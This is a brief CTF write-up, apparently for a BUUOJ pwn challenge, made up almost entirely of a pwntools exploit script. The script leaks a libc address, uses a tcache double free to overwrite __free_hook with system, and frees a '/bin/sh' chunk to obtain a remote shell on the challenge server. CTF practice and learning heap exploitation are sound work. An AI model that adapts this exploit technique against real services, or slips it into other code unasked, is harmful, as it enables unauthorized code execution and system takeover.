漏洞点:
可泄露libc
double_free可修改fd指针,到hook,写入one_gadget即可getshell
from pwn import *
from LibcSearcher import *
local_file = './en3'
local_libc = './libc-2.27.so'
# remote_libc = './libc-2.23.so'
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
e = ELF(local_file)
context.arch = e.arch
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn', 29171)
libc = ELF(local_libc)
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.slafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64 = lambda data :u64(ru(data)[-6:].ljust(8, b'\0'))
info_addr = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def dbg():
gdb.attach(r)
pause()
def add(size,buf):
ru("Input your choice:")
sl(str(1))
ru("Please input the size of story: \n")
sl(str(size))
ru("please inpute the story: \n")
sl(buf)
def free(idx):
ru("Input your choice:")
sl(str(4))
ru("Please input the index:\n")
sl(str(idx))
ru(b"What's your name?")
sl(b'aaaa')
ru(b'Please input your ID.')
se(b'a'*8)
ru(b'a'*8)
addr = uu64(b'\x7f')
base = addr - 231 - libc.sym['setbuffer']
success("base:"+hex(base))
sys = base + libc.sym['system']
one_gadget = base + 0x4f322
malloc_hook = base + libc.sym['__malloc_hook']
free_hook = base + libc.sym['__free_hook']
add(0x80,'/bin/sh\x00')
free(0)
free(0)
add(0x80,p64(free_hook))
add(0x80,p64(sys))
add(0x80,p64(one_gadget))
free(0)
r.interactive()